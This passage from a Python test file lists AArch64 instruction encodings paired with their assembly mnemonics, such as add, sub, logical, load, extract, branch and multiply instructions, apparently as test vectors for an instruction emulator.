("\x20\x00\x02\x8b", "add x0, x1, x2"),
("\x80\x46\xa2\xd2", "movz x0, #0x1234, lsl #16"),
("\x00\x00\x00\x8b", "add x0, x0, x0"),
("\x60\xc0\x22\x8b", "add x0, x3, w2, sxtw"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\x8b", "add x0, x1, w2, sxtb"),
("\x20\xa0\x22\x8b", "add x0, x1, w2, sxth"),
("\x20\xc0\x22\x8b", "add x0, x1, w2, sxtw"),
("\x20\xe0\x22\x8b", "add x0, x1, x2, sxtx"),
("\x20\x00\x02\x8b", "add x0, x1, x2, lsl #0"),
("\x20\x04\x02\x8b", "add x0, x1, x2, lsl #1"),
("\x20\x20\x02\x8b", "add x0, x1, x2, lsl #8"),
("\x20\x40\x02\x8b", "add x0, x1, x2, lsl #16"),
("\x20\x80\x02\x8b", "add x0, x1, x2, lsl #32"),
("\x20\x84\x02\x8b", "add x0, x1, x2, lsl #33"),
("\x20\x88\x02\x8b", "add x0, x1, x2, lsl #34"),
("\x20\x00\x42\x8b", "add x0, x1, x2, lsr #0"),
("\x20\x04\x42\x8b", "add x0, x1, x2, lsr #1"),
("\x20\x20\x42\x8b", "add x0, x1, x2, lsr #8"),
("\x20\x40\x42\x8b", "add x0, x1, x2, lsr #16"),
("\x20\x80\x42\x8b", "add x0, x1, x2, lsr #32"),
("\x20\x84\x42\x8b", "add x0, x1, x2, lsr #33"),
("\x20\x88\x42\x8b", "add x0, x1, x2, lsr #34"),
("\x20\x20\x82\x8b", "add x0, x1, x2, asr #8"),
("\x20\x40\x82\x8b", "add x0, x1, x2, asr #16"),
("\x20\x80\x82\x8b", "add x0, x1, x2, asr #32"),
("\x20\x84\x82\x8b", "add x0, x1, x2, asr #33"),
("\x20\x88\x82\x8b", "add x0, x1, x2, asr #34"),
("\x20\x88\x82\x8b", "add x0, x1, x2, asr #34"),
("\x20\x88\x19\x91", "add x0, x1, #1634"),
("\x20\x58\x21\x91", "add x0, x1, #2134"),
("\x20\x58\x61\x91", "add x0, x1, #2134, lsl #12"),
("\x3f\x60\x22\x8b", "add sp, x1, x2"),
("\x60\x00\x02\xab", "adds x0, x3, x2"),
("\x20\x00\x02\xab", "adds x0, x1, x2"),
("\x80\x46\xa2\xd2", "movz x0, #0x1234, lsl #16"),
("\x00\x00\x00\xab", "adds x0, x0, x0"),
("\x60\xc0\x22\xab", "adds x0, x3, w2, sxtw"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\xab", "adds x0, x1, w2, sxtb"),
("\x20\xa0\x22\xab", "adds x0, x1, w2, sxth"),
("\x20\xc0\x22\xab", "adds x0, x1, w2, sxtw"),
("\x20\xe0\x22\xab", "adds x0, x1, x2, sxtx"),
("\x20\x00\x02\xab", "adds x0, x1, x2, lsl #0"),
("\x20\x04\x02\xab", "adds x0, x1, x2, lsl #1"),
("\x20\x20\x02\xab", "adds x0, x1, x2, lsl #8"),
("\x20\x40\x02\xab", "adds x0, x1, x2, lsl #16"),
("\x20\x80\x02\xab", "adds x0, x1, x2, lsl #32"),
("\x20\x84\x02\xab", "adds x0, x1, x2, lsl #33"),
("\x20\x88\x02\xab", "adds x0, x1, x2, lsl #34"),
("\x20\x00\x42\xab", "adds x0, x1, x2, lsr #0"),
("\x20\x04\x42\xab", "adds x0, x1, x2, lsr #1"),
("\x20\x20\x42\xab", "adds x0, x1, x2, lsr #8"),
("\x20\x40\x42\xab", "adds x0, x1, x2, lsr #16"),
("\x20\x80\x42\xab", "adds x0, x1, x2, lsr #32"),
("\x20\x84\x42\xab", "adds x0, x1, x2, lsr #33"),
("\x20\x88\x42\xab", "adds x0, x1, x2, lsr #34"),
("\x20\x20\x82\xab", "adds x0, x1, x2, asr #8"),
("\x20\x40\x82\xab", "adds x0, x1, x2, asr #16"),
("\x20\x80\x82\xab", "adds x0, x1, x2, asr #32"),
("\x20\x84\x82\xab", "adds x0, x1, x2, asr #33"),
("\x20\x88\x82\xab", "adds x0, x1, x2, asr #34"),
("\x20\x88\x82\xab", "adds x0, x1, x2, asr #34"),
("\x20\x88\x19\xb1", "adds x0, x1, #1634"),
("\x20\x58\x21\xb1", "adds x0, x1, #2134"),
("\x20\x58\x61\xb1", "adds x0, x1, #2134, lsl #12"),
("\x00\x00\x00\xab", "adds x0, x0, x0"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x00\x04\x00\xb1", "adds x0, x0, #1"),
("\x20\x00\x02\x9a", "adc x0, x1, x2"),
("\x20\x00\x02\x1a", "adc w0, w1, w2"),
("\x20\x1a\x09\x30", "adr x0, #0x12345"),
("\xe1\xff\x7f\x70", "adr x1, #0xfffff"),
("\xc1\x7c\x00\xd0", "adrp x1, #0xf9a000"),
("\x41\x0c\x00\xf0", "adrp x1, #0x18b000"),
("\xe1\xff\x9f\xd2", "movz x1, #0xffff"),
("\x22\x00\x80\xd2", "movz x2, #0x1"),
("\x20\x1c\x40\x92", "and x0, x1, #0xff"),
("\x20\x00\x40\x92", "and x0, x1, #0x01"),
("\x20\x00\x7c\x92", "and x0, x1, #0x10"),
("\x20\x00\x02\x8a", "and x0, x1, x2"),
("\x20\x04\x02\x8a", "and x0, x1, x2, lsl #1"),
("\x20\x08\x02\x8a", "and x0, x1, x2, lsl #2"),
("\x20\x0c\x02\x8a", "and x0, x1, x2, lsl #3"),
("\x20\x10\x02\x8a", "and x0, x1, x2, lsl #4"),
("\x20\x1c\x40\xf2", "ands x0, x1, #0xff"),
("\x20\x00\x40\xf2", "ands x0, x1, #0x01"),
("\x20\x00\x7c\xf2", "ands x0, x1, #0x10"),
("\x20\x00\x02\xea", "ands x0, x1, x2"),
("\x20\x04\x02\xea", "ands x0, x1, x2, lsl #1"),
("\x20\x08\x02\xea", "ands x0, x1, x2, lsl #2"),
("\x20\x0c\x02\xea", "ands x0, x1, x2, lsl #3"),
("\x20\x10\x02\xea", "ands x0, x1, x2, lsl #4"),
("\x3f\x1c\x40\xf2", "tst x1, #0xff"),
("\x3f\x00\x40\xf2", "tst x1, #0x01"),
("\x3f\x00\x7c\xf2", "tst x1, #0x10"),
("\x3f\x00\x02\xea", "tst x1, x2"),
("\x3f\x04\x02\xea", "tst x1, x2, lsl #1"),
("\x3f\x08\x02\xea", "tst x1, x2, lsl #2"),
("\x3f\x0c\x02\xea", "tst x1, x2, lsl #3"),
("\x3f\x10\x02\xea", "tst x1, x2, lsl #4"),
("\x20\xfc\x41\x93", "asr x0, x1, #1"),
("\x20\xfc\x42\x93", "asr x0, x1, #2"),
("\x20\xfc\x43\x93", "asr x0, x1, #3"),
("\x20\xfc\x44\x93", "asr x0, x1, #4"),
("\x20\xfc\x44\x93", "asr x0, x1, #4"),
("\x20\xfc\x7f\x93", "asr x0, x1, #63"),
("\xe1\xff\x9f\xd2", "movz x1, #0xffff"),
("\x22\x00\x80\xd2", "movz x2, #0x1"),
("\x20\x28\xc2\x9a", "asr x0, x1, x2"),
("\x42\x00\x80\xd2", "movz x2, #0x2"),
("\x20\x28\xc2\x9a", "asr x0, x1, x2"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\xcb", "sub x0, x1, w2, sxtb"),
("\x20\xa0\x22\xcb", "sub x0, x1, w2, sxth"),
("\x20\xc0\x22\xcb", "sub x0, x1, w2, sxtw"),
("\x20\xe0\x22\xcb", "sub x0, x1, x2, sxtx"),
("\x20\x00\x02\xcb", "sub x0, x1, x2, lsl #0"),
("\x20\x04\x02\xcb", "sub x0, x1, x2, lsl #1"),
("\x20\x20\x02\xcb", "sub x0, x1, x2, lsl #8"),
("\x20\x40\x02\xcb", "sub x0, x1, x2, lsl #16"),
("\x20\x80\x02\xcb", "sub x0, x1, x2, lsl #32"),
("\x20\x84\x02\xcb", "sub x0, x1, x2, lsl #33"),
("\x20\x88\x02\xcb", "sub x0, x1, x2, lsl #34"),
("\x20\x00\x42\xcb", "sub x0, x1, x2, lsr #0"),
("\x20\x04\x42\xcb", "sub x0, x1, x2, lsr #1"),
("\x20\x20\x42\xcb", "sub x0, x1, x2, lsr #8"),
("\x20\x40\x42\xcb", "sub x0, x1, x2, lsr #16"),
("\x20\x80\x42\xcb", "sub x0, x1, x2, lsr #32"),
("\x20\x84\x42\xcb", "sub x0, x1, x2, lsr #33"),
("\x20\x88\x42\xcb", "sub x0, x1, x2, lsr #34"),
("\x20\x20\x82\xcb", "sub x0, x1, x2, asr #8"),
("\x20\x40\x82\xcb", "sub x0, x1, x2, asr #16"),
("\x20\x80\x82\xcb", "sub x0, x1, x2, asr #32"),
("\x20\x84\x82\xcb", "sub x0, x1, x2, asr #33"),
("\x20\x88\x82\xcb", "sub x0, x1, x2, asr #34"),
("\x20\x88\x82\xcb", "sub x0, x1, x2, asr #34"),
("\x20\x88\x19\xd1", "sub x0, x1, #1634"),
("\x20\x58\x21\xd1", "sub x0, x1, #2134"),
("\x20\x58\x61\xd1", "sub x0, x1, #2134, lsl #12"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x80\x22\xeb", "subs x0, x1, w2, sxtb"),
("\x20\xa0\x22\xeb", "subs x0, x1, w2, sxth"),
("\x20\xc0\x22\xeb", "subs x0, x1, w2, sxtw"),
("\x20\xe0\x22\xeb", "subs x0, x1, x2, sxtx"),
("\x20\x00\x02\xeb", "subs x0, x1, x2, lsl #0"),
("\x20\x04\x02\xeb", "subs x0, x1, x2, lsl #1"),
("\x20\x20\x02\xeb", "subs x0, x1, x2, lsl #8"),
("\x20\x40\x02\xeb", "subs x0, x1, x2, lsl #16"),
("\x20\x80\x02\xeb", "subs x0, x1, x2, lsl #32"),
("\x20\x84\x02\xeb", "subs x0, x1, x2, lsl #33"),
("\x20\x88\x02\xeb", "subs x0, x1, x2, lsl #34"),
("\x20\x00\x42\xeb", "subs x0, x1, x2, lsr #0"),
("\x20\x04\x42\xeb", "subs x0, x1, x2, lsr #1"),
("\x20\x20\x42\xeb", "subs x0, x1, x2, lsr #8"),
("\x20\x40\x42\xeb", "subs x0, x1, x2, lsr #16"),
("\x20\x80\x42\xeb", "subs x0, x1, x2, lsr #32"),
("\x20\x84\x42\xeb", "subs x0, x1, x2, lsr #33"),
("\x20\x88\x42\xeb", "subs x0, x1, x2, lsr #34"),
("\x20\x20\x82\xeb", "subs x0, x1, x2, asr #8"),
("\x20\x40\x82\xeb", "subs x0, x1, x2, asr #16"),
("\x20\x80\x82\xeb", "subs x0, x1, x2, asr #32"),
("\x20\x84\x82\xeb", "subs x0, x1, x2, asr #33"),
("\x20\x88\x82\xeb", "subs x0, x1, x2, asr #34"),
("\x20\x88\x82\xeb", "subs x0, x1, x2, asr #34"),
("\x20\x88\x19\xf1", "subs x0, x1, #1634"),
("\x20\x58\x21\xf1", "subs x0, x1, #2134"),
("\x20\x58\x61\xf1", "subs x0, x1, #2134, lsl #12"),
("\x20\x00\x02\xca", "eor x0, x1, x2, lsl #0"),
("\x20\x04\x02\xca", "eor x0, x1, x2, lsl #1"),
("\x20\x20\x02\xca", "eor x0, x1, x2, lsl #8"),
("\x20\x40\x02\xca", "eor x0, x1, x2, lsl #16"),
("\x20\x80\x02\xca", "eor x0, x1, x2, lsl #32"),
("\x20\x84\x02\xca", "eor x0, x1, x2, lsl #33"),
("\x20\x88\x02\xca", "eor x0, x1, x2, lsl #34"),
("\x20\x00\x42\xca", "eor x0, x1, x2, lsr #0"),
("\x20\x04\x42\xca", "eor x0, x1, x2, lsr #1"),
("\x20\x20\x42\xca", "eor x0, x1, x2, lsr #8"),
("\x20\x40\x42\xca", "eor x0, x1, x2, lsr #16"),
("\x20\x80\x42\xca", "eor x0, x1, x2, lsr #32"),
("\x20\x84\x42\xca", "eor x0, x1, x2, lsr #33"),
("\x20\x88\x42\xca", "eor x0, x1, x2, lsr #34"),
("\x20\x20\x82\xca", "eor x0, x1, x2, asr #8"),
("\x20\x40\x82\xca", "eor x0, x1, x2, asr #16"),
("\x20\x80\x82\xca", "eor x0, x1, x2, asr #32"),
("\x20\x84\x82\xca", "eor x0, x1, x2, asr #33"),
("\x20\x88\x82\xca", "eor x0, x1, x2, asr #34"),
("\x20\x88\x82\xca", "eor x0, x1, x2, asr #34"),
("\x20\x1c\x40\xd2", "eor x0, x1, #255"),
("\x20\x18\x40\xd2", "eor x0, x1, #0x7f"),
("\x20\x00\x40\xd2", "eor x0, x1, #1"),
("\x20\x00\x22\xca", "eon x0, x1, x2, lsl #0"),
("\x20\x04\x22\xca", "eon x0, x1, x2, lsl #1"),
("\x20\x20\x22\xca", "eon x0, x1, x2, lsl #8"),
("\x20\x40\x22\xca", "eon x0, x1, x2, lsl #16"),
("\x20\x80\x22\xca", "eon x0, x1, x2, lsl #32"),
("\x20\x84\x22\xca", "eon x0, x1, x2, lsl #33"),
("\x20\x88\x22\xca", "eon x0, x1, x2, lsl #34"),
("\x20\x00\x62\xca", "eon x0, x1, x2, lsr #0"),
("\x20\x04\x62\xca", "eon x0, x1, x2, lsr #1"),
("\x20\x20\x62\xca", "eon x0, x1, x2, lsr #8"),
("\x20\x40\x62\xca", "eon x0, x1, x2, lsr #16"),
("\x20\x80\x62\xca", "eon x0, x1, x2, lsr #32"),
("\x20\x84\x62\xca", "eon x0, x1, x2, lsr #33"),
("\x20\x88\x62\xca", "eon x0, x1, x2, lsr #34"),
("\x20\x20\xa2\xca", "eon x0, x1, x2, asr #8"),
("\x20\x40\xa2\xca", "eon x0, x1, x2, asr #16"),
("\x20\x80\xa2\xca", "eon x0, x1, x2, asr #32"),
("\x20\x84\xa2\xca", "eon x0, x1, x2, asr #33"),
("\x20\x88\xa2\xca", "eon x0, x1, x2, asr #34"),
("\x20\x88\xa2\xca", "eon x0, x1, x2, asr #34"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x00\x22\xaa", "orn x0, x1, x2"),
("\x40\x00\x21\xaa", "orn x0, x2, x1"),
("\x41\x00\x20\xaa", "orn x1, x2, x0"),
("\x01\x00\x22\xaa", "orn x1, x0, x2"),
("\x20\x04\x22\xaa", "orn x0, x1, x2, lsl #1"),
("\x20\x08\x22\xaa", "orn x0, x1, x2, lsl #2"),
("\x20\x0c\x22\xaa", "orn x0, x1, x2, lsl #3"),
("\x20\x04\xe2\xaa", "orn x0, x1, x2, ror #1"),
("\x20\x08\xe2\xaa", "orn x0, x1, x2, ror #2"),
("\x20\x0c\xe2\xaa", "orn x0, x1, x2, ror #3"),
("\x82\x46\x82\xd2", "movz x2, #0x1234"),
("\x01\xcf\x8a\xd2", "movz x1, #0x5678"),
("\x20\x00\x02\xaa", "orr x0, x1, x2"),
("\x40\x00\x01\xaa", "orr x0, x2, x1"),
("\x41\x00\x00\xaa", "orr x1, x2, x0"),
("\x01\x00\x02\xaa", "orr x1, x0, x2"),
("\x20\x04\x02\xaa", "orr x0, x1, x2, lsl #1"),
("\x20\x08\x02\xaa", "orr x0, x1, x2, lsl #2"),
("\x20\x0c\x02\xaa", "orr x0, x1, x2, lsl #3"),
("\x20\x04\xc2\xaa", "orr x0, x1, x2, ror #1"),
("\x20\x08\xc2\xaa", "orr x0, x1, x2, ror #2"),
("\x20\x0c\xc2\xaa", "orr x0, x1, x2, ror #3"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\xf9", "ldr x5, [x1]"),
("\x26\x04\x40\xf8", "ldr x6, [x1], #0"),
("\x27\x44\x40\xf8", "ldr x7, [x1], #4"),
("\x28\x68\x62\xf8", "ldr x8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\xf8", "ldr x9, [x1], #-30"),
("\x2a\x8c\x40\xf8", "ldr x10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\xf9", "ldr x11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\x39", "ldrb w5, [x1]"),
("\x26\x04\x40\x38", "ldrb w6, [x1], #0"),
("\x27\x44\x40\x38", "ldrb w7, [x1], #4"),
("\x28\x68\x62\x38", "ldrb w8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\x38", "ldrb w9, [x1], #-30"),
("\x2a\x8c\x40\x38", "ldrb w10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\x39", "ldrb w11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\x00\x40\x79", "ldrh w5, [x1]"),
("\x26\x04\x40\x78", "ldrh w6, [x1], #0"),
("\x27\x44\x40\x78", "ldrh w7, [x1], #4"),
("\x28\x68\x62\x78", "ldrh w8, [x1, x2]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\x24\x5e\x78", "ldrh w9, [x1], #-30"),
("\x2a\x8c\x40\x78", "ldrh w10, [x1, #8]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\x03\x40\x79", "ldrh w11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x24\x14\x40\xa9", "ldp x4, x5, [x1]"),
("\x25\x18\xc0\xa8", "ldp x5, x6, [x1], #0"),
("\x26\x9c\xc0\xa8", "ldp x6, x7, [x1], #8"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x28\x24\xfe\xa8", "ldp x8, x9, [x1], #-32"),
("\x29\x28\xc1\xa9", "ldp x9, x10, [x1, #16]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xea\x2f\x40\xa9", "ldp x10, x11, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x24\x14\x40\x29", "ldp w4, w5, [x1]"),
("\x25\x18\xc0\x28", "ldp w5, w6, [x1], #0"),
("\x26\x1c\xc1\x28", "ldp w6, w7, [x1], #8"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x28\x24\xfc\x28", "ldp w8, w9, [x1], #-32"),
("\x29\x28\xc2\x29", "ldp w9, w10, [x1, #16]!"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xea\x2f\x40\x29", "ldp w10, w11, [sp]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\xf8", "ldur x0, [x1, #1]"),
("\x20\x20\x40\xf8", "ldur x0, [x1, #2]"),
("\x20\x30\x40\xf8", "ldur x0, [x1, #3]"),
("\x20\x40\x40\xf8", "ldur x0, [x1, #4]"),
("\x20\xf0\x5f\xf8", "ldur x0, [x1, #-1]"),
("\x20\xe0\x5f\xf8", "ldur x0, [x1, #-2]"),
("\x20\xd0\x5f\xf8", "ldur x0, [x1, #-3]"),
("\x20\xc0\x5f\xf8", "ldur x0, [x1, #-4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x40\x38", "ldurb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\x38", "ldurb w0, [x1, #1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x20\x40\x38", "ldurb w0, [x1, #2]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x30\x40\x38", "ldurb w0, [x1, #3]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x40\x40\x38", "ldurb w0, [x1, #4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xf0\x5f\x38", "ldurb w0, [x1, #0xffffffffffffffff]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xe0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffe]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xd0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffd]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xc0\x5f\x38", "ldurb w0, [x1, #0xfffffffffffffffc]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x40\x78", "ldurh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x10\x40\x78", "ldurh w0, [x1, #1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x20\x40\x78", "ldurh w0, [x1, #2]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x30\x40\x78", "ldurh w0, [x1, #3]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x40\x40\x78", "ldurh w0, [x1, #4]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xf0\x5f\x78", "ldurh w0, [x1, #0xffffffffffffffff]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xe0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffe]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xd0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffd]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\xc0\x5f\x78", "ldurh w0, [x1, #0xfffffffffffffffc]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x38", "ldursb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x78", "ldursh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x78", "ldursh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb8", "ldursw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x38", "ldursb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x38", "ldursb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x78", "ldursh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x78", "ldursh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb8", "ldursw x0, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x21\x30\x00\x91", "add x1, x1, #12"), # STACK+12
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x39", "ldrsb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x79", "ldrsh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x79", "ldrsh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb9", "ldrsw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x39", "ldrsb x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x39", "ldrsb w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\xc0\x79", "ldrsh w0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\x79", "ldrsh x0, [x1]"),
("\x20\x00\x40\xf8", "ldur x0, [x1]"),
("\x20\x00\x80\xb9", "ldrsw x0, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x06\xa0\xd2", "movz x2, #0x30, lsl #16"), # HEAP address
("\x42\x78\x00\x91", "add x2, x2, #30"),
("\x23\x00\x40\xf8", "ldur x3, [x1]"),
("\x44\x00\x40\xf8", "ldur x4, [x2]"),
("\x60\x00\xc4\x93", "extr x0, x3, x4, #0"),
("\x60\x04\xc4\x93", "extr x0, x3, x4, #1"),
("\x60\x08\xc4\x93", "extr x0, x3, x4, #2"),
("\x60\x0c\xc4\x93", "extr x0, x3, x4, #2"),
("\x60\x78\xc4\x93", "extr x0, x3, x4, #30"),
("\x60\xfc\xc4\x93", "extr x0, x3, x4, #63"),
("\x60\x00\x84\x13", "extr w0, w3, w4, #0"),
("\x60\x04\x84\x13", "extr w0, w3, w4, #1"),
("\x60\x08\x84\x13", "extr w0, w3, w4, #2"),
("\x60\x0c\x84\x13", "extr w0, w3, w4, #3"),
("\x60\x7c\x84\x13", "extr w0, w3, w4, #31"),
("\x01\x00\x00\x14", "b #4"),
#("\x02\x00\x00\x14", "b #8"), # FIXME cannot handle this with
#("\x03\x00\x00\x14", "b #12"), # unicorn emulating only one
#("\x00\xd0\x48\x14", "b #0x1234000"), # instruction...
#("\x74\xbb\xff\x17", "b #-0x11230"), #
("\x20\x00\x00\x54" ,"b.eq #4"),
#("\x40\x00\x00\x54" ,"b.eq #8"),
("\x01\x00\x00\x94" ,"bl #4"),
("\x80\x0c\x90\xb7", "tbnz x0, #0x32, #0x190"),
("\x20\x00\x90\xb6", "tbz x0, #0x32, #4"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x06\xa0\xd2", "movz x2, #0x20, lsl #16"), # STACK address
("\xe1\x03\x02\xaa", "mov x1, x2"),
("\x3f\x00\x00\x91", "mov sp, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xe0\x03\x21\xaa", "mvn x0, x1"),
("\xe0\x03\x01\xcb", "neg x0, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x0c\x02\x9b", "madd x0, x1, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x00\x0c\x02\x9b", "madd x0, x0, x2, x3"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x7c\x02\x9b", "mul x0, x1, x2"),
